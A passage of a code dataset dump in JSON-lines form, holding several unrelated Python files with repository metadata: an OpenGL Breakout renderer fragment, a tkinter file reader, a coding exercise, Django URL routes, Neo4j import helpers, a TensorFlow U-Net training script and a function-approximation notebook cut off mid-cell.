0:\n glColor3f(1.0, 1.0, 0.0)\n elif block[1] == 3:\n # block_blue\n glColor3f(69.0/255.0, 177.0/255.0, 232.0/255.0)\n elif block[1] == 2:\n # block_green\n glColor3f(86.0/255.0, 174.0/255.0, 87.0/255.0)\n elif block[1] == 1:\n # block_red\n glColor3f(242.0/255.0, 85.0/255.0, 96.0/255.0)\n rect = block[0]\n glBegin(GL_QUADS)\n glVertex2f(rect[0][0], rect[0][1])\n glVertex2f(rect[1][0], rect[1][1])\n glVertex2f(rect[2][0], rect[2][1])\n glVertex2f(rect[3][0], rect[3][1])\n glEnd()\n # glFlush()","repo_name":"mayyar/6122_atari_breakout","sub_path":"wall.py","file_name":"wall.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18720077571","text":"import tkinter as tk\nimport string\n\nroot = tk.Tk()\n\n\nroot.geometry(\"250x170\")\n\nT = tk.Text(root, height=10 , width=100)\n\n\nl = tk.Label(root, text=\"File operations\")\nl.config(font=(\"Courier\", 14))\n\nf = open(\"C:\\\\Users\\\\C605\\\\Desktop\\\\Marvel.txt\", \"r\")\nx = f.read()\ndef inster_text():\n T.delete(1.0,'end')\n T.insert(tk.END, x)\n\ndef count():\n d = dict()\n\n with 
open('C:\\\\Users\\\\C605\\\\Desktop\\\\Marvel.txt', 'r') as file:\n # reading each line\n for line in file:\n\n # reading each word\n for word in line.split():\n # displaying the words\n if word in d:\n # Increment count of word by 1\n d[word] = d[word] + 1\n else:\n # Add the word to dictionary with count 1\n d[word] = 1\n print(d)\n T.delete(1.0,'end')\n T.insert(tk.END,d)\n\n\n\n\nprint(x)\n\nb1 = tk.Button(root, text=\"Read\", command=inster_text)\n\n\nb2 = tk.Button(root, text=\"Exit\",\n command=root.destroy)\n\n\nb3 = tk.Button(root, text=\"Calculate\",\n command=count)\n\nf.read()\nl.pack()\nT.pack()\nb1.pack()\nb2.pack()\nb3.pack()\n\ntk.mainloop()\n","repo_name":"armaras/cppPyhtonLab","sub_path":"tkinter.py","file_name":"tkinter.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16127826791","text":"'''Consecutive zeros\n\nThe goal of this challenge is to analyze a binary string consisting of only zeros\nand ones. Your code should find the biggest number of consecutive zeros in the string.\nFor example, given the string:\n\n\"1001101000110\"\n\nThe biggest number of consecutive zeros is 3.\n\nDefine a function named consecutive_zeros that takes a single parameter,\nwhich is the string of zeros and ones. Your function should return the number\ndescribed above.'''\n\ndef consecutive_zeros(binary):\n \n #Max successive 0 counter\n maxcount = 0\n \n #Live counter for 0 inside the for loop\n count = 0\n \n for number in binary:\n #if loops meets a 0, starts counting\n if number == \"0\" :\n count += 1\n \n #Update maxcount value if a better 0s streak is met inside the for loop\n if count > maxcount :\n maxcount = count\n \n #Reset counter if number met is not a 0\n else:\n count = 0\n\n return maxcount \n\n\n","repo_name":"roldel/pythonprinciples.com-challenges","sub_path":"Challenge_16_Consecutive_Zeros.py","file_name":"Challenge_16_Consecutive_Zeros.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23907021487","text":"from django.urls import path\nfrom .views import products, add_product, delete_product, product_edit, delete_item, delete_invItem\n\napp_name = 'products'\n\nurlpatterns = [\n path('products/', products, name='products'),\n path('add_product/', add_product, name='add_product'),\n path('delete_product/', delete_product, name='delete_product'),\n path('product//', product_edit, name='product_edit'),\n path('products/delete_item/', delete_item, name='delete_item'),\n path('product/delete_invoice_item', delete_invItem, name='delete_invItem'),\n]\n","repo_name":"Kkiirra/Auto-Invoice-Maker","sub_path":"products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72096577800","text":"# -*- coding: utf-8 -*-\n\nfrom .configuration_manager import ConfigurationManager\nfrom .data_containers.data_container import DataContainer\nfrom .data_containers.wang_landau_data_container import WangLandauDataContainer\n\n\"\"\"\nmchammer - Monte Carlo simulation module\n\"\"\"\n\n__project__ = 'icet-mchammer'\n__description__ = 'icet Monte Carlo simulations module'\n__all__ = ['ConfigurationManager',\n 'DataContainer',\n 'WangLandauDataContainer']\n__maintainer__ = 'The icet developers team'\n__maintainer_email__ = 'icet@materialsmodeling.org'\n__url__ = 
'http://icet.materialsmodeling.org/'\n","repo_name":"dengxiongshi/icet-master","sub_path":"mchammer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"42552920654","text":"arr = [2,4,6,3,34,56,354,78]\narr.sort()\n\ndef binS(arr,l,h,x):\n while(l<=h):\n m = l + int((h-l)/2)\n if arr[m] == x:\n return m\n elif arr[m] neo4j.ResultSummary:\n query = f\"\"\"UNWIND $rows AS row\nWITH row\nCALL {{\n WITH row \n MERGE (doc:{DOC_NODE} {{{DOC_ID}: row.{DOC_ID}}})\n SET\n doc.{DOC_CONTENT_TYPE} = row.{DOC_CONTENT_TYPE},\n doc.{DOC_CONTENT_LENGTH} = toInteger(row.{DOC_CONTENT_LENGTH}),\n doc.{DOC_EXTRACTION_DATE} = datetime(row.{DOC_EXTRACTION_DATE}),\n doc.{DOC_DIRNAME} = row.{DOC_DIRNAME},\n doc.{DOC_PATH} = row.{DOC_PATH}\n WITH doc, row\n WHERE doc.{DOC_ID} = row.{DOC_ID} and row.{DOC_ROOT_ID} IS NOT NULL\n MERGE (root:{DOC_NODE} {{{DOC_ID}: row.{DOC_ROOT_ID}}})\n MERGE (doc)-[:{DOC_ROOT_TYPE}]->(root)\n}} IN TRANSACTIONS OF $batchSize ROWS\n\"\"\"\n res = await neo4j_session.run(query, rows=records, batchSize=transaction_batch_size)\n summary = await res.consume()\n return summary\n\n\nasync def documents_ids_tx(tx: neo4j.AsyncTransaction) -> List[str]:\n res = await tx.run(document_ids_query())\n res = [doc_id.value(DOC_ID) async for doc_id in res]\n return res\n\n\ndef document_ids_query() -> str:\n query = f\"\"\"MATCH (doc:{DOC_NODE})\nRETURN doc.{DOC_ID} as {DOC_ID}\n\"\"\"\n return query\n","repo_name":"ICIJ/datashare-extension-neo4j","sub_path":"neo4j-app/neo4j_app/core/neo4j/documents.py","file_name":"documents.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"18407464441","text":"import tensorflow as tf\nimport numpy as np\nimport cv2\nfrom PIL import Image as Ige\n\ndef writeInfo(text):\n\twith open(\"info.txt\",\"a\") as f:\n\t\tf.write(str(text)+\"\\n\")\n\ndef augment(img):\n\ti=1\n\twhile i!=95:\n\t\tj=1\n\t\twhile j!=95:\n\t\t\tif img[i][j]==1:\n\t\t\t\timg[i-1][j]=1\n\t\t\t\timg[i+1][j]=1\n\t\t\t\timg[i][j-1]=1\n\t\t\t\timg[i][j+1]=1\n\t\t\tj+=1\n\t\ti+=1\n\ndef binaryToImg(bin):\n\taxis = []\n\tfor xAxis in bin:\n\t\telement = []\n\t\tfor yAxis in xAxis:\n\t\t\ttemp = []\n\t\t\tif yAxis == 0:\n\t\t\t\ttemp.append(0)\n\t\t\t\ttemp.append(0)\n\t\t\t\ttemp.append(0)\n\t\t\telse:\n\t\t\t\ttemp.append(255)\n\t\t\t\ttemp.append(255)\n\t\t\t\ttemp.append(255)\n\t\t\ttemp = np.array(temp,dtype = 'uint8')\n\t\t\telement.append(temp)\n\t\telement = np.array(element)\n\t\taxis.append(element)\n\n\taxis = np.array(axis)\n\treturn axis\n\ndef compressImg(img):\n\tif len(img[0][0])==3:\n\t\tsample_image = np.asarray(a=img[:, :, 0], dtype=np.uint8)\n\t\treturn sample_image\n\tif len(img[0][0])==4:\n\t\tnewImg = []\n\t\ti=0\n\t\twhile i!=96:\n\t\t\ttempList = []\n\t\t\tj=0\n\t\t\twhile j!=96:\n\t\t\t\ttempList.append(255-img[i][j][3])\n\t\t\t\tj+=1\n\t\t\tnewImg.append(tempList)\n\t\t\ti+=1\n\t\timg = np.asarray(a = newImg,dtype = np.uint8)\n\t\treturn img\n\ndef readData_single(path):\n\tpath = path+\"/train_set_Unet.tfrecords\"\n\n\tfilename_queue = tf.train.string_input_producer([path],num_epochs = 20,shuffle = True)\n\n\treader = tf.TFRecordReader()\n\n\t_,serialized_example = reader.read(filename_queue)\n\n\tfeatures = tf.parse_single_example(serialized_example,features = {\n\t\t\t'img': tf.FixedLenFeature([], tf.string),\n\t\t\t'label': 
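# Aside on the Neo4j helpers in the record above: a hedged sketch of how
# documents_ids_tx might be driven with the async driver (neo4j >= 5).
# The URI and credentials are assumptions, not values from the record.
import neo4j

async def list_document_ids():
    driver = neo4j.AsyncGraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "password"))
    async with driver.session() as session:
        # execute_read runs documents_ids_tx inside a managed read transaction
        ids = await session.execute_read(documents_ids_tx)
    await driver.close()
    return ids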
tf.FixedLenFeature([], tf.string)\n\t\t})\n\n\timage = tf.decode_raw(features['img'],tf.uint8)\n\n\timage = tf.reshape(image,[96,96,1])\n\n\tlabel = tf.decode_raw(features['label'],tf.uint8)\n\n\tlabel = tf.reshape(label,[96,96])\n\n\treturn image,label\n\t\n\nclass Unet:\n\n\tdef __init__(self):\n\t\n\t\tself.keep_prob = tf.placeholder(dtype=tf.float32)\n\n\t\tself.lamb = tf.placeholder(dtype = tf.float32)\n\n\t\tself.unPooling = []\n\n\t\tself.input_image = None\n\n\t\tself.input_label = None\n\n\t\tself.prediction = None\n\n\t\tself.correct_prediction = None\n\n\t\tself.accurancy = None\n\n\t\tself.loss = None\n\n\t\tself.loss_mean = None\n\n\t\tself.loss_all = None\n\n\t\tself.train_step = None\n\n\n\tdef weight_variable(self,shape):\n\t initial = tf.truncated_normal(shape,stddev=tf.sqrt(x = 2/(shape[0]*shape[1]*shape[2])))\n\t #initial = tf.truncated_normal(shape,stddev=0.01)\n\t tf.add_to_collection(name = 'loss',value=tf.contrib.layers.l2_regularizer(self.lamb)(initial)) \n\t return tf.Variable(initial)\n\n\tdef bias_variable(self,shape):\n\t initial = tf.random_normal(shape=shape,dtype = tf.float32)\n\t return tf.Variable(initial_value = initial)\n\n\tdef weight_variable_alter(self,shape):\n\t initial = tf.truncated_normal(shape,stddev=0.28)\n\t tf.add_to_collection(name = 'loss',value=tf.contrib.layers.l2_regularizer(self.lamb)(initial)) \n\t return tf.Variable(initial)\n\n\tdef conv2d(self,x,W):\n\t return tf.nn.conv2d(x,W,strides=[1,1,1,1],padding = 'SAME')\n\n\tdef max_pooling(self,x):\n\t return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding='VALID')\n\n\tdef deconv(self,x,W,O):\n\t\treturn tf.nn.conv2d_transpose(value = x,filter = W,output_shape = O,strides=[1,2,2,1],padding = 'VALID')\n\n\tdef merge_img(self,convo_layer,unsampling):\n\t\treturn tf.concat(values = [convo_layer,unsampling],axis = -1)\n\n\tdef setup_network(self,batch_size,mode):\n\n\t\tself.input_image = tf.placeholder(dtype = tf.float32,shape = [batch_size,96,96,1])\n\n\t\tself.input_label = tf.placeholder(dtype = tf.int32,shape = [batch_size,96,96])\n\n\n\t\t#first convolution 96*96*1 -->48*48*32\n\n\t\t\n\t\twith tf.name_scope('first_convolution'):\n\n\t\t\t#---------conv1----------\n\n\t\t\tw_conv = self.weight_variable([3,3,1,32])\n\t\t\tb_conv = self.bias_variable([32])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(self.input_image,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\t# ---------conv2-----------\n\t\t\tw_conv = self.weight_variable([3,3,32,32])\n\t\t\tb_conv = self.bias_variable([32])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\tself.unPooling.append(X)\n\n\t\t\t#---------maxpool--------\n\n\t\t\timg_pool = self.max_pooling(img_conv)\n\n\t\t\tX = img_pool\n\n\t\t\tX = tf.nn.dropout(X,keep_prob = self.keep_prob)\n\n\t\t#second convolution 48*48*32 --> 24*24*64\n\n\t\twith tf.name_scope('second_convolution'):\n\n\t\t\t#---------conv1----------\n\n\t\t\tw_conv = self.weight_variable([3,3,32,64])\n\t\t\tb_conv = self.bias_variable([64])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\t# ---------conv2-----------\n\t\t\tw_conv = self.weight_variable([3,3,64,64])\n\t\t\tb_conv = self.bias_variable([64])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\tself.unPooling.append(X)\n\n\t\t\t#---------maxpool--------\n\n\t\t\timg_pool = self.max_pooling(img_conv)\n\n\t\t\tX = img_pool\n\n\t\t\tX = tf.nn.dropout(X,keep_prob = self.keep_prob)\n\n\t\t#third convolution 
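# Aside on the shape comments in this U-Net (96*96 -> 48*48 -> 24*24 -> 12*12):
# each 2x2, stride-2 max-pool halves the spatial size, which a one-liner confirms.
print([96 // (2 ** k) for k in range(4)])  # [96, 48, 24, 12]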
24*24*64 -->12*12*128 \n\n\t\twith tf.name_scope('third_convolution'):\n\n\t\t\t#---------conv1----------\n\n\t\t\tw_conv = self.weight_variable([3,3,64,128])\n\t\t\tb_conv = self.bias_variable([128])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\t# ---------conv2-----------\n\t\t\tw_conv = self.weight_variable([3,3,128,128])\n\t\t\tb_conv = self.bias_variable([128])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\tself.unPooling.append(X)\n\n\t\t\t#---------maxpool--------\n\n\t\t\timg_pool = self.max_pooling(img_conv)\n\n\t\t\tX = img_pool\n\n\t\t\tX = tf.nn.dropout(X,keep_prob = self.keep_prob)\n\n\n\t\t#bottom convolution 12*12*128 --->24*24*128\n\n\t\t\n\t\twith tf.name_scope('bottom_convolution'):\n\n\t\t\t#---------conv1----------\n\n\t\t\tw_conv = self.weight_variable([3,3,128,256])\n\t\t\tb_conv = self.bias_variable([256])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\t# ---------conv2-----------\n\t\t\tw_conv = self.weight_variable([3,3,256,256])\n\t\t\tb_conv = self.bias_variable([256])\n\n\t\t\timg_conv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_conv\n\n\t\t\t#---------usample--------\n\t\t\tw_conv = self.weight_variable([2,2,128,256])\n\t\t\tb_conv = self.bias_variable([128])\n\n\n\t\t\timg_deconv = tf.nn.relu(self.deconv(img_conv,w_conv,[batch_size,24,24,128])+b_conv)\n\t\t\tX = img_deconv\n\n\t\t\tX = tf.nn.dropout(X,keep_prob = self.keep_prob)\n\n\n\t\twith tf.name_scope('first_deconvolution'):\n\n\t\t\ttempMatrix = self.unPooling[2]\n\n\t\t\t#transfer the matrix\n\n\t\t\tif mode == 1:\n\n\t\t\t\tw_conv = self.weight_variable_alter([24*24*128,1])\n\t\t\t\tb_conv = self.bias_variable([24*24*128])\n\n\t\t\t\ttempMatrix = tf.reshape(tempMatrix,[batch_size,24*24*128])\n\n\t\t\t\ttempMatrix = tf.nn.relu(tf.matmul(tempMatrix,w_conv)+b_conv)\n\n\n\t\t\t\tw_conv = self.weight_variable_alter([24*24*128,1])\n\t\t\t\tb_conv = self.bias_variable([24*24*128])\n\n\t\t\t\ttempMatrix = tf.nn.relu(tf.matmul(tempMatrix,w_conv)+b_conv)\n\n\t\t\t\ttempMatrix = tf.reshape(tempMatrix,[batch_size,24,24,128])\n\n\n\t\t\tX = self.merge_img(tempMatrix,X)\n\n\t\t\t#first deconvolution\n\t\t\t\n\t\t\tw_conv = self.weight_variable([3,3,256,128])\n\t\t\tb_conv = self.bias_variable([128])\n\n\t\t\timg_deconv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_deconv\n\n\t\t\tw_conv = self.weight_variable([3,3,128,128])\n\t\t\tb_conv = self.bias_variable([128])\n\n\t\t\timg_deconv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_deconv\n\n\t\t\tw_conv = self.weight_variable([2,2,64,128])\n\t\t\tb_conv = self.bias_variable([64])\n\n\n\t\t\timg_deconv = tf.nn.relu(self.deconv(img_deconv,w_conv,[batch_size,48,48,64])+b_conv)\n\n\n\t\t\tX = img_deconv\n\n\t\t\tX = tf.nn.dropout(X,keep_prob = self.keep_prob)\n\n\n\t\twith tf.name_scope('second_deconvolution'):\n\n\t\t\ttempMatrix = self.unPooling[1]\n\n\t\t\t#transfer the matrix\n\n\t\t\tif mode == 1:\n\n\t\t\t\tw_conv = self.weight_variable_alter([48*48*64,1])\n\t\t\t\tb_conv = self.bias_variable([48*48*64])\n\t\t\t\t\n\n\t\t\t\ttempMatrix = tf.reshape(tempMatrix,[batch_size,48*48*64])\n\n\t\t\t\ttempMatrix = tf.nn.relu(tf.matmul(tempMatrix,w_conv)+b_conv)\n\n\t\t\t\t\n\t\t\t\tw_conv = self.weight_variable_alter([48*48*64,1])\n\t\t\t\tb_conv = self.bias_variable([48*48*64])\n\n\t\t\t\ttempMatrix = tf.nn.relu(tf.matmul(tempMatrix,w_conv)+b_conv)\n\n\t\t\t\ttempMatrix = 
tf.reshape(tempMatrix,[batch_size,48,48,64])\n\n\n\t\t\tX = self.merge_img(tempMatrix,X)\n\n\t\t\t# second deconvolution\n\n\t\t\tw_conv = self.weight_variable([3,3,128,64])\n\t\t\tb_conv = self.bias_variable([64])\n\n\t\t\timg_deconv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_deconv\n\n\t\t\tw_conv = self.weight_variable([3,3,64,64])\n\t\t\tb_conv = self.bias_variable([64])\n\n\t\t\timg_deconv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_deconv\n\n\t\t\tw_conv = self.weight_variable([2,2,32,64])\n\t\t\tb_conv = self.bias_variable([32])\n\n\n\t\t\timg_deconv = tf.nn.relu(self.deconv(img_deconv,w_conv,[batch_size,96,96,32])+b_conv)\n\n\n\t\t\tX = img_deconv\n\n\t\t\tX = tf.nn.dropout(X,keep_prob = self.keep_prob)\n\n\n\t\twith tf.name_scope('final_layer'):\n\n\t\t\ttempMatrix = self.unPooling[0]\n\n\t\t\t#transfer the matrix\n\n\t\t\tif mode == 1:\n\n\t\t\t\tw_conv = self.weight_variable_alter([96*96*32,1])\n\t\t\t\tb_conv = self.bias_variable([96*96*32])\n\n\t\t\t\t\n\t\t\t\ttempMatrix = tf.reshape(tempMatrix,[batch_size,96*96*32])\n\n\t\t\t\ttempMatrix = tf.nn.relu(tf.matmul(tempMatrix,w_conv)+b_conv)\n\n\t\t\t\tw_conv = self.weight_variable_alter([96*96*32,1])\n\t\t\t\tb_conv = self.bias_variable([96*96*32])\n\n\t\t\t\ttempMatrix = tf.nn.relu(tf.matmul(tempMatrix,w_conv)+b_conv)\n\n\t\t\t\ttempMatrix = tf.reshape(tempMatrix,[batch_size,96,96,32])\n\n\n\t\t\tX = self.merge_img(tempMatrix,X)\n\n\t\t\t#final layer\n\n\t\t\tw_conv = self.weight_variable([3,3,64,32])\n\t\t\tb_conv = self.bias_variable([32])\n\n\t\t\timg_deconv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_deconv\n\n\t\t\tw_conv = self.weight_variable([3,3,32,32])\n\t\t\tb_conv = self.bias_variable([32])\n\n\t\t\timg_deconv = tf.nn.relu(self.conv2d(X,w_conv)+b_conv)\n\n\t\t\tX = img_deconv\n\n\t\t\tw_conv = self.weight_variable([1,1,32,2])\n\t\t\tb_conv = self.bias_variable([2])\n\n\t\t\timg_deconv = tf.nn.conv2d(input = X,filter = w_conv,strides = [1,1,1,1],padding = 'VALID')\n\n\t\t\tself.prediction = tf.nn.bias_add(img_deconv,b_conv)\n\n\n\t\t#softmax loss\n\n\t\twith tf.name_scope('softmax'):\n\n\t\t\tself.loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels = self.input_label,logits = self.prediction, name = 'loss')\n\n\t\t\tself.loss_mean = tf.reduce_mean(self.loss)\n\n\t\t\ttf.add_to_collection(name = 'loss',value=self.loss_mean)\n\n\t\t\tself.loss_all = tf.add_n(inputs = tf.get_collection(key= 'loss'))\n\n\n\n\t\twith tf.name_scope('accurancy'):\n\n\t\t\tself.correct_prediction = tf.equal(tf.argmax(input=self.prediction, axis=3, output_type=tf.int32), self.input_label)\n\n\t\t\tself.correct_prediction = tf.cast(self.correct_prediction,tf.float32)\n\n\t\t\tself.accurancy = tf.reduce_mean(self.correct_prediction)\n\n\t\twith tf.name_scope('gradient_descent'):\n\n\t\t\tself.train_step = tf.train.AdamOptimizer(learning_rate=0.0001).minimize(self.loss_all)\n\n\n\n\tdef train(self,batch_size,path):\n\n\t\tckpt_path = path+\"/ckpt-unet/model.ckpt\"\n\t\t\n\t\ttf.summary.scalar(\"loss\", self.loss_mean)\n\t\t\n\t\ttf.summary.scalar('accuracy', self.accurancy)\n\t\t\n\t\tmerged_summary = tf.summary.merge_all()\n\n\n\t\tmodel_dir = path+\"/data/model\"\n\n\t\ttb_dir = path+\"/data/logs\"\n\n\t\tall_parameters_saver = tf.train.Saver()\n\n\n\t\twith tf.Session() as sess:\n\n\t\t\timage,label = readData_single(path)\n\n\t\t\timage_batch,label_batch = tf.train.shuffle_batch([image,label],batch_size = batch_size,num_threads = 4,capacity = 1012,min_after_dequeue = 
1000)\n\n\t\t\tlabel_batch = tf.reshape(label_batch, [batch_size, 96, 96])\n\n\t\t\tsess.run(tf.global_variables_initializer())\n\t\t\t\n\t\t\tsess.run(tf.local_variables_initializer())\n\n\t\t\tsummary_writer = tf.summary.FileWriter(tb_dir, sess.graph)\n\t\t\t\n\t\t\ttf.summary.FileWriter(model_dir, sess.graph)\n\t\t\t\n\t\t\tcoord = tf.train.Coordinator()\n\t\t\t\n\t\t\tthreads = tf.train.start_queue_runners(coord = coord)\n\n\t\t\ttry:\n\n\t\t\t\tepoch = 1\n\n\t\t\t\twhile not coord.should_stop():\n\n\n\t\t\t\t\texample,label = sess.run([image_batch,label_batch])\n\n\n\t\t\t\t\tlo,acc,summary = sess.run([self.loss_mean,self.accurancy,merged_summary],feed_dict = {\n\t\t\t\t\t\t\tself.input_image:example,self.input_label:label,self.keep_prob:1.0,self.lamb:0.004\n\t\t\t\t\t\t})\n\n\t\t\t\t\tsummary_writer.add_summary(summary, epoch)\n\n\t\t\t\t\tsess.run([self.train_step],feed_dict={\n\t\t\t\t\t\t\tself.input_image: example, self.input_label: label, self.keep_prob: 0.6,\n\t\t\t\t\t\t\tself.lamb: 0.004\n\t\t\t\t\t\t})\n\n\t\t\t\t\tepoch+=1\n\n\n\t\t\t\t\tif epoch%10 == 0:\n\t\t\t\t\t\twriteInfo(str(epoch)+\" \"+str(lo)+\" \"+str(acc))\n\t\t\t\t\t\tprint('num %d, loss: %.6f and accuracy: %.6f' % (epoch, lo, acc))\n\n\t\t\t\t\tif epoch% 300 == 0:\n\t\t\t\t\t\tall_parameters_saver.save(sess = sess,save_path = ckpt_path)\n\n\n\t\t\texcept tf.errors.OutOfRangeError:\n\t\t\t\tprint('Done training -- epoch limit reached')\t\n\n\n\t\t\tfinally:\n\t\t\t\tall_parameters_saver.save(sess = sess,save_path = ckpt_path)\n\t\t\t\tcoord.request_stop()\n\n\t\t\tcoord.join(threads)\n\n\t\t\tprint(\"done training\")\n\n\n\n\tdef estimate(self,batch_size,path):\n\t\timgPath = path+\"/J17522.jpg\"\n\n\t\timg = cv2.imdecode(np.fromfile(imgPath,dtype=np.uint8),-1)\n\t\timg = cv2.resize(src = img,dsize=(96,96))\n\t\timg = compressImg(img)\n\t\t\n\t\tnewImg = []\n\t\ti=0\n\t\twhile i!=batch_size:\n\t\t\tnewImg.append(img)\n\t\t\ti+=1\n\t\tdata = newImg\n\t\tdata = np.reshape(a=data, newshape=(batch_size,96,96,1))\n\n\t\tckpt_path = path+\"/ckpt-unet/model.ckpt\"\n\n\t\tall_parameters_saver = tf.train.Saver()\n\t\twith tf.Session() as sess: \n\t\t\tsess.run(tf.global_variables_initializer())\n\t\t\tsess.run(tf.local_variables_initializer())\n\t\t\tall_parameters_saver.restore(sess=sess, save_path=ckpt_path)\n\t\t\tpredict_image = sess.run(\n\t\t\t\t\t\t\ttf.argmax(input=self.prediction, axis=3), \n\t\t\t\t\t\t\tfeed_dict={\n\t\t\t\t\t\t\t\tself.input_image: data,\n\t\t\t\t\t\t\t\tself.keep_prob: 1.0, self.lamb: 0.004\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t)\n\t\t\t\n\t\t\tpredict_image = predict_image[0]\n\t\t\t\n\t\t\tpredict_image = binaryToImg(predict_image)\n\t\t\tpredict_image = Ige.fromarray(predict_image,'RGB')\n\t\t\tpredict_image.save('predict_image.jpg')\n\t\t\tpredict_image.show() \n\t\t\t\n\t\t\t\n\t\tprint('Done prediction')\n\n\n\ndef main():\n\tbasePath = \"/root\"\n\tunet = Unet()\n\tunet.setup_network(64,1)\n\tunet.train(64,basePath)\n\t#unet.estimate(64,basePath)\n\nmain()\n","repo_name":"MarshallDu0204/oracle-bone-script","sub_path":"U-net-alter.py","file_name":"U-net-alter.py","file_ext":"py","file_size_in_byte":13715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25620408923","text":"\n# coding: utf-8\n\n# # ** CPSC 8810 Deep Learning - HW1-1 **\n# ---\n# \n# ## Introduction\n# \n# The main objective of this assignments:\n# * Train 2 distinct DNN models with same amount of parameters until convergence\n# * Compare the training process of two 
different models\n# * Visualize ground truth and predictions from models\n# \n# In this assignment, two neural networks with the same number of parameters but a different number of layers are trained to simulate two separate functions. To ensure reproducible results, the random seed is fixed for this assignment. The outputs of both models are then compared in the final cell of this notebook to determine the effect of the number of layers or the number of activation functions used.\n\n# In[193]:\n\n\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.decomposition import PCA\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\ntf.__version__\n\n\n# ### Set the seed to obtain reproducible results\n\n# In[194]:\n\n\ntf.set_random_seed(1)\nnp.random.seed(1)\n\n\n# ## Data preparation and visualization\n# \n# In the first assignment, two distinct functions are used to compare two models with a different number of layers but the same number of parameters.\n# ### Function 1 \n# *f(x) = Sin(5πx)/(5πx)* \n# ### Function 2\n# *f(x) = sign(Sin(5πx))*\n# \n\n# In[195]:\n\n\nX = np.arange(0.0001,1,0.0001)\nX_train = X.reshape(-1,1).astype(np.float32)\nY1 = np.sin(5*np.pi*X)/(5*np.pi*X)\nY1_train = Y1.reshape(-1,1).astype(np.float32)\nY2 = np.sign(np.sin(5*np.pi*X))\nY2_train = Y2.reshape(-1,1).astype(np.float32)\nfig,axs = plt.subplots(1,2)\nfig.suptitle('Functions')\nfig.set_figwidth(15)\naxs[0].plot(X,Y1)\naxs[0].set_xlabel('x')\naxs[0].set_ylabel('f(x)')\naxs[0].set_title('f(x) = Sin(5πx)/(5πx)')\naxs[1].plot(X,Y2)\naxs[1].set_xlabel('x')\naxs[1].set_ylabel('f(x)')\naxs[1].set_title('f(x) = sign(Sin(5πx))');\n\n\n# ## Placeholder for Input and Output\n\n# In[210]:\n\n\ntf.reset_default_graph()\ninput_x = tf.placeholder(tf.float32,shape=[None,1])\noutput_y = tf.placeholder(tf.float32,shape=[None,1])\n\n\n# ## 1 - 1st Model\n\n# ### 1.1 Network Architecture\n\n# In[211]:\n\n\n# Model 1 neural network layers\nm1_h1 = tf.layers.dense(inputs=input_x, units=5, activation=tf.nn.relu, name='model1_h1') # hidden layer\nm1_h2 = tf.layers.dense(inputs=m1_h1, units=10, activation=tf.nn.relu, name='model1_h2') # hidden layer\nm1_h3 = tf.layers.dense(inputs=m1_h2, units=15, activation=tf.nn.relu, name='model1_h3') # hidden layer\nm1_h4 = tf.layers.dense(inputs=m1_h3, units=10, activation=tf.nn.relu, name='model1_h4') # hidden layer\nm1_h5 = tf.layers.dense(inputs=m1_h4, units=5, activation=tf.nn.relu, name='model1_h5') # hidden layer\nm1_output = tf.layers.dense(inputs=m1_h5, units=1, name='model1_output') # output layer fed by the last hidden layer\n\n\n# ### 1.2 Parameters Count\n\n# In[212]:\n\n\ntotal_parameters = 0\nfor variable in tf.trainable_variables():\n    if(variable.name.find(\"model1\")>=0):\n        print(variable)\n        shape = variable.get_shape()\n        variable_parameters = 1\n        for dim in shape:\n            variable_parameters *= dim.value\n        print(\"parameter num:\",variable_parameters)\n        total_parameters += variable_parameters\nprint(\"Total Parameter: \",total_parameters)\n\n\n# ### 1.3 Loss function and Optimizer Initialization\n\n# In[213]:\n\n\nm1_loss = tf.losses.mean_squared_error(output_y, m1_output) # compute cost\nm1_optimizer = tf.train.AdamOptimizer(learning_rate=0.0001)\nm1_train_op = m1_optimizer.minimize(m1_loss)\n\n\n# ### 1.4 Training model on Function 1\n\n# In[214]:\n\n\nsess = tf.Session() \nsess.run(tf.global_variables_initializer())     # initialize var in 